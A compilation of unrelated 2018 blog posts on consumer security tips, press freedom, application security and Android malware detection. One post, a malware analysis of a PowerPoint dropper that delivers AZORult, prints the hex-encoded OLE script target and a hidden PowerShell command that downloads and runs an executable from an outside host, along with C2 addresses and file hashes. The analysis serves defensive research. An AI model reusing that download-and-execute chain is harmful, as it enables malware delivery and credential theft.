  • Look at your stats. A lot of people don’t go to the doctor or dentist because they claim “not knowing” about an ailment is less stressful than smartphone screen timeknowing. Don’t take that approach to your screen time. Make today the day you take a hard look at reality. Both iOS and Android now have screen time tracking.
  • Get reinforcements.  There are a lot of apps out there like Your Hour, AppBlock, Stay Focused, Flipd, and App Off Timer designed to help curb your smartphone usage. Check out the one/s that fits your needs and best helps you control your screen time.
  • Plan your week. If you have activities planned ahead of time for the week — like a hike, reading, a movie, or spending time with friends — you are less likely to fritter away hours on your phone.
  • Leave your phone at home. Just a decade ago we spent full days away from home running errands, visiting friends, and exploring the outdoors — all without our phones. The world kept turning. Nothing fell to pieces. So start small. Go to the grocery store without your phone. Next, have dinner with friends. Then, go on a full day excursion. Wean yourself off your device and reclaim your days and strengthen your relationships.
  • Establish/enforce free family zones. Modeling control in your phone use helps your kids to do the same. Establish phone free zones such as homework time, the dinner table, family activities, and bedtime. The key here is that once you establish the phone free zones, be sure to enforce them. A lot of parents (me included) get lax after a while in this area. Research products that allow you to set rules and time limits for apps and websites. McAfee Safe Family helps you establish limits with pre-defined age-based rules that you can be customized based on your family’s needs.
  • Delete unused apps. Give this a try: Delete one social app at a time, for just a day or a week, to see if you need it. If you end up keeping even one time-wasting app off your phone, the change will be well worth it.
  • Engage with people over your phone. If you are in the line at the grocery store, waiting for a show to begin, or hanging out at your child’s school/ sports events, seek to connect with people rather than pull out your phone. Do this intentionally for a week, and it may become a habit!
  • Do one thing at a time. A lot of wasted device time happens because we are multi-tasking — and that time adds up. So if you are watching a movie, reading, or even doing housework put your phone in another room — in a drawer. Try training yourself to focus on doing one thing at a time.smartphone screen time
  • Give yourself a phone curfew. We’ve talked about phone curfews for kids to help them get enough sleep but how about one for parents? Pick a time that works for you and stick to it. (I’m choosing to put my phone away at 8 p.m. every night.)
  • Use voice recorder, notes app, or text. Spending too much time uploading random content? Curb your urge to check or post on social media by using your voice recorder app to speak your thoughts into. Likewise, pin that article or post that photo to your notes to catalog it in a meaningful way or text/share it with a small group of people. These few changes could result in big hours saved on social sites.
  • Turn off notifications. You can’t help but look at those notifications so change your habitual response by turning off all notifications.
  • Limit, don’t quit. Moderation is key to making changes stick. Try limiting your social media time to 10 minutes a day. Choose a time that works and set a timer if you need to. There’s no need to sever all ties with social media just keep it in its proper place.

Slow but Specific Changes

Lastly, go at change slowly (but specifically) and give yourself some grace. Change isn’t easy. You didn’t rack up those screen time stats overnight. You’ve come to rely on your phone for a lot of tasks as well as entertainment. So, there’s no need to approach this as a life overhaul, a digital detox, or take an everything or nothing approach. Nor is there a need to trumpet your social departure to your online communities. Just take a look at your reality and do what you need to do to take back your time and control that unruly third child once and for all. You’ve got this!

The post Has Your Phone Become Your Third Child? Ways to Get Screen Time Anxiety Under Control appeared first on McAfee Blogs.

Federal judge reinstates CNN reporter’s press pass after Trump revoked it for critical coverage

trump

In an important victory for press freedom, Federal Judge Timothy Kelly ordered the Trump administration on Friday to temporarily reinstate CNN White House correspondent Jim Acosta’s press credentials.

“We are gratified with this result and we look forward to a full resolution in the coming days,” CNN said in a statement. “Our sincere thanks to all who have supported not just CNN, but a free, strong and independent American press.”

The White House unilaterally revoked Acosta’s press pass last week, following a tense press conference in which Acosta aggressively questioned the president about the special counsel’s Russia investigation.

On November 13, CNN and Acosta filed a lawsuit against Donald Trump as well as other administration officials, alleging that the White House’s suspension of Acosta’s press credentials had violated Acosta’s Fifth Amendment rights.

“Because CNN’s chief White House correspondent has effectively been prohibited from reporting from the White House and the President’s trips, its newsgathering and reporting abilities have been significantly hampered, causing harm not just to CNN, but also to its many viewers and readers who rely on CNN as an essential news source,” reads the complaint by CNN [PDF].

As CNN reported from the court proceedings earlier this week, the Trump administration lawyer  made the rather illuminating argument “that it would be perfectly legal for the White House to revoke a journalist's credentials if it didn't agree with their reporting.”

President Trump has spent his two years in office incessantly threatening his critics and attacking the press. But over and over, Trump has disproportionately targeted and insulted CNN, and specifically Jim Acosta.

When Acosta tried to ask Trump a question days before the president’s inauguration in 2017, he refused. “I’m not going to give you a question,” he said. “You are fake news.”

Jim Acosta’s reporting style is perhaps more direct and belligerent than other reporters with the White House press corps. His willingness to ask Trump tough questions and hold him to answering them is critical in the face of an administration that readily lies and manipulates the truth.

CNN is standing by Acosta, and it’s not the only one. Numerous news organizations — including the Associated Press, Bloomberg, First Look Media, the New York Times, the Washington Post, and Fox News — have filed amicus briefs in support of the lawsuit.

When a reporter asked Trump how long he would leave Acosta “in the penalty box”, the president responded: “As far as I’m concerned, I haven’t made that decision. But it could be others also.”

The White House retaliating against a reporter it doesn't like by denying him access altogether is a threat to all reporting on the president.

“If this kind of retaliation were allowed to go unchallenged, the White House would feel emboldened to use the threat of similar revocations as a means of discouraging critical news coverage,” Katie Fallow and Jameel Jaffer warned in the Columbia Journalism Review. “Other reporters would inevitably hesitate before asking White House officials sharp questions. If the president were allowed to ban reporters whose questions he didn’t like, the result would be press conferences that served only to celebrate, and not challenge, the administration’s agenda.”

In response to CNN’s suit, the government has argued that no one has a constitutional right to a press pass, and the president has the authority to decide which journalists he speaks with and allows into the White House.

“No journalist has a First Amendment right to enter the White House and the President need not survive First Amendment scrutiny whenever he exercises his discretion to deny an individual journalist one of the many hundreds of passes granting on-demand access to the White House complex,” the government’s attorneys wrote in an opposition to CNN’s motion [PDF].

The government’s argument may seem intuitive — as one Twitter user joked, “If having a press pass is a right, I want one!” — but it sidesteps the actual issues in the case.

“The question here is not, does anybody claiming to be a journalist have the right to attend a briefing at the White House or access to the White House facilities?” Jonathan Peters, a professor of journalism and law at the University of Georgia, told Freedom of the Press Foundation. “The question is, what process is due a journalist who has received a press pass from the White House before the White House revokes it? And, can the White House revoke a press pass based on [the journalist’s] content and viewpoint?”

In other words, Acosta may not have a right to a press pass, but he does have the right not have the government arbitrarily take his press pass away.

Timothy Kelly, the federal judge presiding over CNN’s case against the president, seemed to accept with that reasoning when he granted CNN’s motion for a temporary restraining order on Friday.

Following the judge’s order, the White House begrudgingly reinstated Acosta’s press pass, but the lawsuit remains ongoing.

In remarks at the Oval Office, president Trump suggested that he would ultimately prevail in court, once the White House set up a standard process for revoking journalists’ press credentials.

“You have to act with respect when you’re at the White House, and when I see the way some of my people get treated at news conferences, it’s terrible. So we’re setting up a certain standard, which is what the court is requesting,” he said.

“We will end up back in court and we will win,” he added.

What Your Password Says About You

At the end of last year, a survey revealed that the most popular password was still “123456,” followed by “password.” These highly hackable choices are despite years of education around the importance of password security. So, what does this say about people who pick simple passwords? Most likely, they are shooting for a password that is easy to remember rather than super secure.

The urge to pick simple passwords is understandable given the large number of passwords that are required in our modern lives—for banking, social media, and online services, to simply unlocking our phones. But choosing weak passwords can be a major mistake, opening you up to theft and identity fraud.

Even if you choose complicated passwords, the recent rash of corporate data breaches means you could be at even greater risk by repeating passwords across accounts. When you repeat passwords all a hacker needs to do is breach one service provider to obtain a password that can unlock a string of accounts, including your online banking services. These accounts often include identity information, leaving you open to impersonation. The bad guys could open up fraudulent accounts in your name, for example, or even collect your health benefits.

So, now that you know the risks of weak password security, let’s see what your password says about you. Take this quiz to find out, and don’t forget to review our password safety tips below!

Password Quiz – Answer “Yes” or “No”

  1. Your passwords don’t include your address, birthdate, anniversary, or pet’s name.
  2. You don’t repeat passwords.
  3. Your passwords are at least 8 characters long and include numbers, upper and lower case letters, and characters.
  4. You change default passwords on devices to something hard to guess.
  5. You routinely lock your phone and devices with a passcode or fingerprint.
  6. You don’t share your passwords with people you’re dating or friends.
  7. You use a password manager.
  8. If you write your passwords down, you keep them hidden in a safe place, where no one else can find them.
  9. You get creative with answers to security questions to make them harder to guess. For example, instead of naming the city where you grew up, you name your favorite city, so someone who simply reads your social media profile cannot guess the answer.
  10. You make sure no one is watching when you type in your passwords.
  11. You try to make your passwords memorable by including phrases that have meaning to you.
  12. You use multi-factor authentication.

Now, give yourself 1 point for each question you answered “yes” to, and 0 points for each question you answered “no” to. Add them up to see what your password says about you.

9-12 points:

You’re a Password Pro!

You take password security seriously and know the importance of using unique, complicated passwords for each account. Want to up your password game? Use multi-factor authentication, if you don’t already. This is when you use more than one method to authenticate your identity before logging in to an account, such as typing in a password, as well as a code that is sent to your phone via text message.

4-8 points

You’re a Passable Passworder

You go through the basics, but when it comes to making your accounts as secure as they can be you sometimes skip important steps. Instead of creating complicated passwords yourself—and struggling to remember them—you may want to use a password manager, and let it do the work for you. Soon, you’ll be a pro!

1-3 points

You’re a Hacker’s Helper

Uh oh! It looks like you’re not taking password security seriously enough to ensure that your accounts and data stay safe. Start by reading through the tips below. It’s never too late to upgrade your passwords, so set aside a little time to boost your security.

Key Tips to Become a Password Pro:

  • Always choose unique, complicated passwords—Try to make sure they are at least 8 characters long and include a combination of numbers, letters, and characters. Don’t repeat passwords for critical accounts, like financial and health services, and keep them to yourself.Also, consider using a password manager to help create and store unique passwords for you. This way you don’t have to write passwords down or memorize them. Password managers are sometimes offered as part of security software.
  • Make your password memorable—We know that people continue to choose simple passwords because they are easier to remember, but there are tricks to creating complicated and memorable passwords. For instance, you can string random words together that mean something to you, and intersperse them with numbers and characters. Or, you can choose random letters that comprise a pattern only know to you, such as the fist letter in each word of a sentence in your favorite book.
  • Use comprehensive security software—Remember, a strong password is just the first line of defense. Back it up with robust security softwarethat can detect and stop known threats, help you browse safely, and protect you from identity theft.

For more great password tips, go here.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What Your Password Says About You appeared first on McAfee Blogs.

Veracode at Black Hat Europe 2018

We recently published the 9th volume of our State of Software Security (SoSS) report, and although there are some bright spots, the overall state of software security remains a work in progress. Nowhere is this more true than in Europe. In separate research conducted earlier this year, we found that organizations in Europe are very aware of and concerned about application security. A staggering 94 percent of IDG/Veracode survey respondents agree it’s important to assess the application security capabilities of the vendors and partners from whom they procure software and applications. But at the same time, AppSec programs at most European organizations are not as mature as those in the Americas. In fact, our SoSS data found that European companies lagged behind the average significantly at every milepost of the flaw persistence intervals (how long security-related defects remain in code before being fixed). It took more than double the average time for European organizations to close out three quarters of their open vulnerabilities. Troublingly, 25 percent of vulnerabilities persisted more than two and-a-half years after discovery.

With shifting development models, and cyberattacks on the rise, addressing this problem and developing an application security program can feel overwhelming for many organizations. But we’ve been doing this for 10+ years, and we know what works, what doesn’t, and what it takes to build a mature, effective program over time. Two important parts of that process are creating security champions, and establishing a game plan for securely using open source. And those are two of the topics we’ll be tackling at Black Hat Europe next month.

Please stop by Booth 402 to meet the team and see the powerful Veracode application security solution in action. In addition, don’t miss the Veracode sessions:

  • The State of Software Security: Looking at Europe: Paul Farrington, Director, Solutions Architecture, Veracode, Wednesday, December 5, 10:15am
  • The Truth About Open Source: How Third-Party Libraries Can Introduce Risks: Chris Wysopal, Chief Technology Officer, Veracode, Wednesday, December 5, 11:25am
  • SDL at Scale: Growing Security Champions: Ryan O’Boyle Product Security Architect, Veracode, Wednesday, December 5, 10:30am

We look forward to seeing you there! Get details.

Prosecuting WikiLeaks for publishing activities poses a profound threat to press freedom

Assange
Uwe Steinert

On Thursday night Justice Department prosecutors inadvertently published court documents that strongly suggest that the Trump administration has secretly filed charges against WikiLeaks publisher Julian Assange. Shortly afterwards, the Washington Post confirmed that charges have indeed been filed against Assange.

While it’s so far unclear what the charges are, news organizations have speculated they may involve the Espionage Act, the 100 year old law that—on its face—threatens the ability of journalists to do their jobs and could criminalize national security reporting. The Espionage Act has, up until this point, never been used to prosecute a journalist or publisher.

Trevor Timm, executive director of Freedom of the Press Foundation, has issued the following statement:

“Any charges brought against WikiLeaks for their publishing activities pose a profound and incredibly dangerous threat to press freedom. Whether you like Assange or hate him, the theories used in a potential Espionage Act prosecution would threaten countless reporters at the New York Times, Washington Post, and the many other news outlets that report on government secrets all the time. While everyone will have to wait and see what the charges detail, it’s quite possible core First Amendment principles will be at stake in this case.”

We will have much more analysis and comment as this case develops.


Microsoft Powerpoint as Malware Dropper

Nowadays Microsoft office documents are often used to propagate Malware acting like dynamic droppers. Microsoft Excel within macros or Microsoft Word with user actions (like links or external OLE objects) are the main player in this "Office Dropping Arena". When I figured out that a Microsoft Powerpoint was used to drop and to execute a Malicious payload I was amazed, it's not so common (at least on my personal experiences), so I decided to write a little bit about it.

The "attack-path" is very close to what it's observable on modern threats since years: eMail campaign with attached document and actionable text on it. At the beginning the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to: hxxps://a.doko.moe/wraeop.sct

Analysing the Microsoft Powerpoint structure it rises on my eyes the following slide structure

Stage 1: Microsoft PowerPoint Dropping Website
An external OLEobject (compatibility 2006) was available on that value:
Target="%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74"  
Decoding that string from HEX to ASCII is much more readable:

scrIPT:hxxps://a.dolo.moe/wraeop.sct

An external object is downloaded and executed like a script on the victim machine. The downloaded file (wraeop.sct) represents a Javascript code reporting the Stage 2 of the infection process. It's showed as follows:

Stage 2: Executed Javascript
Decoding the 3.6K script appears clear that one more Stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.
var run = new ActiveXObject('WSCRIPT.Shell').Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe', '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe'); Start-Process '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe' ); 
The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted few hours later on VirusTotal.

Stage 3: .NET file 
The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4. In other words Stage 3 reads an image placed under the internal resource of PE File, extracts and executes it. The final payload looks like AzoRult Malware. The evidence comes from traffic analysis where the identified pattern sends (http POST) data on browser history and specific crafted files under User - AppData to specific php pages. Moreover the Command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZOrultV3.


Stage4: AZORult evidences


I hope you had fun on this, I did! It was super interesting to see Attacker's creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content. Stay tuned! 

IoC:
Original Powerpoint: 6ae5583ec767b7ed16aaa45068a1239a827a6dae95387d5d147c58c7c5f71457
wraeop.sct: 4f38fcea4a04074d2729228fb6341d0c03363660f159134db35b4d259b071bb0
download1: hxxps://a.dolo.moe/wraeop.sct
download2: hxxp://batteryenhancer.com
DAZZI.exe: c26de4d43100d24017d82bffd1b8c5f1f9888cb749ad59d2cd02ef505ae59f40
Resource Img: 965b74e02b60c44d75591a9e71c94e88365619fe1f82208c40be518865a819da
C2: hxxps://ominigrind.ml/azzi/index.php

Don’t Get PWNed by Fake Gaming Currency Sites

If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and time-consuming to complete. As a result, many players look to various websites as an easier way to download more gaming currency. Unfortunately, malicious actors are taking advantage of this trend to scam gamers into downloading malware or PUPs (potentially unwanted programs).

There are a variety of techniques scammers use to trick players into utilizing their malicious sites. The first is fake chat rooms. Scammers will set up seemingly legitimate chat rooms where users can post comments or ask questions. What users don’t know is that a bot is actually answering their inquiries automatically. Scammers also ask these victims for “human interaction” by prompting them to enter their personal information via surveys to complete the currency download. What’s more – the message will show a countdown to create a sense of urgency for the user.

These scammers also use additional techniques to make their sites believable, including fake Facebook comments and “live” recent activity updates. The comments and recent activity shown are actually hard-coded into the scam site, giving the appearance that other players are receiving free gaming currency.

These tactics, along with a handful of others, encourage gamers to use the scam sites so cybercriminals can distribute their malicious PUPs or malware. So, with such deceptive sites existing around the internet, the next question is – what can players do to protect themselves from these scammers? Check out the following tips to avoid this cyberthreat:

  • Exercise caution when clicking on links. If a site for virtual currency is asking you to enter your username, password, or financial information, chances are the website is untrustworthy. Remember, when in doubt, always err on the side of caution and avoid giving your information to a site you’re not 100% sure of.
  • Put the chat room to the test. To determine if a chat site is fake, ask the same question a few times. If you notice the same response, it is likely a phony website.
  • Do a Google search of the Facebook comments. An easy way to check if the Facebook comments that appear on a site are legitimate is to copy and paste them into Google. If you see a lot of similar websites come up with the same comments in the description, this is a good indication that it is a scam site.
  • Use security software to surf the web safely. Products like McAfee WebAdvisor can help block gamers from accessing the malicious sites mentioned in this blog.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Don’t Get PWNed by Fake Gaming Currency Sites appeared first on McAfee Blogs.

Combating Potentially Harmful Applications with Machine Learning at Google: Datasets and Models



[Cross-posted from the Android Developers Blog]

In a previous blog post, we talked about using machine learning to combat Potentially Harmful Applications (PHAs). This blog post covers how Google uses machine learning techniques to detect and classify PHAs. We'll discuss the challenges in the PHA detection space, including the scale of data, the correct identification of PHA behaviors, and the evolution of PHA families. Next, we will introduce two of the datasets that make the training and implementation of machine learning models possible, such as app analysis data and Google Play data. Finally, we will present some of the approaches we use, including logistic regression and deep neural networks.

Using Machine Learning to Scale

Detecting PHAs is challenging and requires a lot of resources. Our security experts need to understand how apps interact with the system and the user, analyze complex signals to find PHA behavior, and evolve their tactics to stay ahead of PHA authors. Every day, Google Play Protect (GPP) analyzes over half a million apps, which makes a lot of new data for our security experts to process.

Leveraging machine learning helps us detect PHAs faster and at a larger scale. We can detect more PHAs just by adding additional computing resources. In many cases, machine learning can find PHA signals in the training data without human intervention. Sometimes, those signals are different than signals found by security experts. Machine learning can take better advantage of this data, and discover hidden relationships between signals more effectively.

There are two major parts of Google Play Protect's machine learning protections: the data and the machine learning models.

Data Sources

The quality and quantity of the data used to create a model are crucial to the success of the system. For the purpose of PHA detection and classification, our system mainly uses two anonymous data sources: data from analyzing apps and data from how users experience apps.

App Data

Google Play Protect analyzes every app that it can find on the internet. We created a dataset by decomposing each app's APK and extracting PHA signals with deep analysis. We execute various processes on each app to find particular features and behaviors that are relevant to the PHA categories in scope (for example, SMS fraud, phishing, privilege escalation). Static analysis examines the different resources inside an APK file while dynamic analysis checks the behavior of the app when it's actually running. These two approaches complement each other. For example, dynamic analysis requires the execution of the app regardless of how obfuscated its code is (obfuscation hinders static analysis), and static analysis can help detect cloaking attempts in the code that may in practice bypass dynamic analysis-based detection. In the end, this analysis produces information about the app's characteristics, which serve as a fundamental data source for machine learning algorithms.

Google Play Data

In addition to analyzing each app, we also try to understand how users perceive that app. User feedback (such as the number of installs, uninstalls, user ratings, and comments) collected from Google Play can help us identify problematic apps. Similarly, information about the developer (such as the certificates they use and their history of published apps) contribute valuable knowledge that can be used to identify PHAs. All these metrics are generated when developers submit a new app (or new version of an app) and by millions of Google Play users every day. This information helps us to understand the quality, behavior, and purpose of an app so that we can identify new PHA behaviors or identify similar apps.

In general, our data sources yield raw signals, which then need to be transformed into machine learning features for use by our algorithms. Some signals, such as the permissions that an app requests, have a clear semantic meaning and can be directly used. In other cases, we need to engineer our data to make new, more powerful features. For example, we can aggregate the ratings of all apps that a particular developer owns, so we can calculate a rating per developer and use it to validate future apps. We also employ several techniques to focus in on interesting data.To create compact representations for sparse data, we use embedding. To help streamline the data to make it more useful to models, we use feature selection. Depending on the target, feature selection helps us keep the most relevant signals and remove irrelevant ones.

By combining our different datasets and investing in feature engineering and feature selection, we improve the quality of the data that can be fed to various types of machine learning models.

Models

Building a good machine learning model is like building a skyscraper: quality materials are important, but a great design is also essential. Like the materials in a skyscraper, good datasets and features are important to machine learning, but a great algorithm is essential to identify PHA behaviors effectively and efficiently.

We train models to identify PHAs that belong to a specific category, such as SMS-fraud or phishing. Such categories are quite broad and contain a large number of samples given the number of PHA families that fit the definition. Alternatively, we also have models focusing on a much smaller scale, such as a family, which is composed of a group of apps that are part of the same PHA campaign and that share similar source code and behaviors. On the one hand, having a single model to tackle an entire PHA category may be attractive in terms of simplicity but precision may be an issue as the model will have to generalize the behaviors of a large number of PHAs believed to have something in common. On the other hand, developing multiple PHA models may require additional engineering efforts, but may result in better precision at the cost of reduced scope.

We use a variety of modeling techniques to modify our machine learning approach, including supervised and unsupervised ones.

One supervised technique we use is logistic regression, which has been widely adopted in the industry. These models have a simple structure and can be trained quickly. Logistic regression models can be analyzed to understand the importance of the different PHA and app features they are built with, allowing us to improve our feature engineering process. After a few cycles of training, evaluation, and improvement, we can launch the best models in production and monitor their performance.

For more complex cases, we employ deep learning. Compared to logistic regression, deep learning is good at capturing complicated interactions between different features and extracting hidden patterns. The millions of apps in Google Play provide a rich dataset, which is advantageous to deep learning.

In addition to our targeted feature engineering efforts, we experiment with many aspects of deep neural networks. For example, a deep neural network can have multiple layers and each layer has several neurons to process signals. We can experiment with the number of layers and neurons per layer to change model behaviors.

We also adopt unsupervised machine learning methods. Many PHAs use similar abuse techniques and tricks, so they look almost identical to each other. An unsupervised approach helps define clusters of apps that look or behave similarly, which allows us to mitigate and identify PHAs more effectively. We can automate the process of categorizing that type of app if we are confident in the model or can request help from a human expert to validate what the model found.

PHAs are constantly evolving, so our models need constant updating and monitoring. In production, models are fed with data from recent apps, which help them stay relevant. However, new abuse techniques and behaviors need to be continuously detected and fed into our machine learning models to be able to catch new PHAs and stay on top of recent trends. This is a continuous cycle of model creation and updating that also requires tuning to ensure that the precision and coverage of the system as a whole matches our detection goals.

Looking forward

As part of Google's AI-first strategy, our work leverages many machine learning resources across the company, such as tools and infrastructures developed by Google Brain and Google Research. In 2017, our machine learning models successfully detected 60.3% of PHAs identified by Google Play Protect, covering over 2 billion Android devices. We continue to research and invest in machine learning to scale and simplify the detection of PHAs in the Android ecosystem.

Acknowledgements

This work was developed in joint collaboration with Google Play Protect, Safe Browsing and Play Abuse teams with contributions from Andrew Ahn, Hrishikesh Aradhye, Daniel Bali, Hongji Bao, Yajie Hu, Arthur Kaiser, Elena Kovakina, Salvador Mandujano, Melinda Miller, Rahul Mishra, Sebastian Porst, Monirul Sharif, Sri Somanchi, Sai Deep Tetali, and Zhikun Wang.

The Open Source Conundrum

If you’ve read or watched the news at all in the last five years, you know that securing software is challenging. And in today’s world, developers are shouldering a big part of this challenge. Here lies the conundrum. Developers are in the best position to secure code, but security is often not one of their priorities. With the shift to DevOps in recent years, development is all about speed of delivery, which means moving quickly and relying on open source code, and which often comes into conflict with the goals of security. In many cases, this had led to a “patch and pray” model – where organizations patch vulnerabilities when they hear about them, and then pray it wasn’t exploited in the window between discovery and patching. But this doesn’t have to be the case. We can take advantage of open source libraries and move at the speed of DevOps without relying solely on a reactive security model.

However, we do need to acknowledge that open source has changed the security game. Just the sheer numbers are landscape-altering. At SourceClear, we’ve found that most companies have more open source code than internally developed code – in many instances, in fact, the open source share is up to 90 percent. In terms of security, this means that the attack surface has changed dramatically. In this environment, it becomes critical to ask four questions:

1. What open source code are you using? (Hint: It’s more than you think.)

2. Where did it come from? Should I trust it?

3. What does it do?

4. What vulnerabilities are present?

Ultimately, control over what is in your code has changed. Today, you need new security solutions to reduce risk in this new environment.

Join me in person this month to dig further into this problem, and its solutions. I’m hitting the road for our “Open Source Conundrum” roadshow beginning November 27. Find out when I’ll be in a city near you, and stop by to network with peers and get some solid advice on this challenging security issue.

2018 Americas Partner Summit

The Americas Partner Summit 2018 was held on Tuesday, October 16 at MPOWER Cybersecurity Summit. It was a day filled with McAfee and partner leadership coming together to collaborate on McAfee’s partner strategy, product portfolio, programs, and more. Here are some of the highlights:

The Audience

  • 338 partners
    • 225 VAR, Disti, MSP, etc.
    • 35 OEM
    • 78 SIA
  • 28% Executive-Level
  • 46% Director-Level
  • 26% Technical or Consultant-Level

McAfee Partner of the Year Awards

I invited the McAfee leadership team to the stage and we recognized 25 partners with awards for excellence and innovation in security. We welcomed DJ Miss Ninja to have some fun while we celebrated this elite group of partners for the work they’ve accomplished through innovative solutions for better customer outcomes, selling into net new logo accounts, and more. You can view the full list of winners here.

Create the Possible

As you know, McAfee has a vast ecosystem of partners – professional services, solution providers, service providers/systems integrators, original equipment manufacturers, security innovation alliance, and distribution. In 2017, I challenged you, our partner community, to collaborate with each other, and with McAfee, to deliver innovative solutions for better customer outcomes. And, wow did you deliver! Throughout the day, we showed seven short videos highlighting the innovation from unique partners in the Americas. Thank you to the partners who stepped out to document their success. The work that the McAfee Partner community has delivered in the last year is truly a testament that we can Create the Possible when we work together.

Key Takeaways

Partners heard program, product, and corporate strategy from our C-Level executives, and had the opportunity to dig deeper into the information through ample Q&A throughout the day. While we took numerous questions from the audience, our executives had some key call to actions from the partners.

To read about the key takeaways, download the slides from the various presentations, etc. please click here to visit the partner portal Partner Summit 2018 page.

 To Summarize

Partner Summit is where our partners go beyond the keynotes. Innovation, collaboration, and momentum is what will allow us to Create the Possible. The annual Partner Summit event provides a space where McAfee and McAfee Partners come together to build momentum to get us to the next possibility.

If you were unable to attend, I hope to see you next year. If you attended, I sincerely thank you and hope you walked away with action items that we can accomplish together.

Let’s go create the possible! Together is power.

The post 2018 Americas Partner Summit appeared first on McAfee Blogs.

Holiday Stress Can Make You More Careless Online

Holiday stress. Every year, come November, my resting heart rate starts to rise: the festive season is approaching. Not only is there so much to do but there’s so much to spend money on. There are presents to purchase, feasts to prepare and party outfits to buy. Throw in a holiday to fill the long Summer break, and both the credit cards and my stress levels are starting to rapidly increase!

Holiday Financial Stress Results in Poor Decision Making Online

But did you know that this stress can affect our online safety? Research conducted by McAfee shows that almost 80% of us believe the holiday period causes financial stress. And nearly half of us (46%) believe the stress of the holiday season can cause us to behave carelessly online.  Risky behaviours can put our online safety at risk. For instance, using public Wi-Fi to snag a last-minute purchase. Or buying something from an unfamiliar website because it’s cheaper.

Aussie Shoppers Love an Online Bargain 

In 2017, Aussies spent a record $21.3 million online – a whopping 19% increase over 2016. McAfee’s research shows that Aussie consumers love securing a bargain online – who doesn’t!! But many will seek out a great deal even if it means potentially jeopardising their online safety. The research shows that 64% of consumers are willing to use an unfamiliar website if it means they can save money on their purchase. Even more concerning, a third of Aussies admitted to clicking links in suspicious emails for better deals!! Yikes!!

The Thing Is, Cyber Criminals Love Your Holiday Shopping Too

Cyber criminals work very hard to take advantage of us during the busy Holiday season. They come up with all sorts of ingenious ways to target time-poor and budget-conscious consumers online. They know very well that many of us will cut corners with our online security. Particularly if we think we can save money on presents, outfits or even a holiday.

And they scheme accordingly: charity phishing emails, fake online stores, bogus delivery emails, e-voucher scams and more. Cyber criminals have tried and tested strategies to either steal our personal information or our identity.

How You Can Stay Safe While Shopping Online This Holiday Season

So, don’t feel like you need to battle the crowds at Westfield this festive season. You can still shop online safely if you follow a few simple steps:

  1. Connect with Caution

Public Wi-Fi is just so convenient, but it is a risky business. Users could unknowingly share their personal information with cyber criminals who are snooping on the network. So, if you absolutely have to use public Wi-Fi for a great online shopping deal, always use a Virtual Private Network (VPN) such as McAfee Safe Connect which creates a bank-grade encrypted connection.

  1. Think Before You Click

One of the easiest ways for a cyber criminal to target victims is using phishing emails to trick consumers into sharing their personal information. Phishing emails could be disguised as holiday savings or even a shopping notification. Instead of clicking on a link in an email, always check directly with the source to verify an offer or shipment.

  1. Always Shop with Security Protection

Shopping online without security protection is like driving without a seat belt – dangerous! Comprehensive antivirus software like McAfee Total Protection will help shield your devices against malware, phishing attacks and other threats. It also provides a firewall, an anti-spam function, parental controls and a password management tool. A complete no-brainer!

But this year, I’m going to commit to lowering my stress. That way I can really enjoy my time with my family and friends. To get ahead of the game I plan to:

  • Start my online shopping earlier so I don’t ‘cut corners’ with my online safety,
  • Create a realistic budget, and
  • Start filling my freezer with some holiday food – now

And most importantly, get that resting heart rate under control!!

Happy Holidays Everyone!

Alex xx

The post Holiday Stress Can Make You More Careless Online appeared first on McAfee Blogs.

Preventing WebCobra Malware From Slithering Onto Your System

Cryptocurrency mining is the way transactions are verified and added to the public ledger, a database of all the transactions made around a particular piece of cryptocurrency. Cryptocurrency miners compile all of these transactions into blocks and try to solve complicated mathematical problems to compete with other miners for bitcoins. To do this, miners need a ton of computer resources, since successful bitcoin mining requires a large amount of hardware. Unfortunately, these miners can be used for more nefarious purposes if they’re included within malicious software. Enter WebCobra, a malware that exploits victims’ computers to help cybercriminals mine for cryptocurrencies, a method also known as cryptojacking.

How does WebCobra malware work, exactly? First, WebCobra uses droppers (Trojans designed to install malware onto a victim’s device) to check the computer’s system. The droppers let the malware know which cryptocurrency miner to launch. Then, it silently slithers onto a victim’s device via rogue PUP (potentially unwanted program) and installs one of two miners: Cryptonight or Claymore’s Zcash. Depending on the miner, it will drain the victim’s device of its computer processor’s resources or install malicious file folders that are difficult to find.

The most threatening part of WebCobra malware is that it can be very difficult to detect. Often times, the only sign of its presence is decreased computer performance. Plus, when the dropper is scanning the victim’s device, it will also check for security products running on the system. Many security products use APIs, or application programming interfaces, to monitor malware behavior – and WebCobra is able to overwrite some. This means it can essentially unhook the API and disrupt the system’s communication methods, and therefore remain undetected for a long time.

While cryptocurrency mining can be a harmless hobby, users should be cautious of criminal miners with poor intentions. So, what can you do to prevent WebCobra from slithering onto your system? Check out the following tips:

  • If your computer slows down, be cautious. It can be hard to determine if your device is being used for a cryptojacking campaign. One way you can identify the attack – poor performance. If your device is slow or acting strange, start investigating and see if your device may be infected with malware.
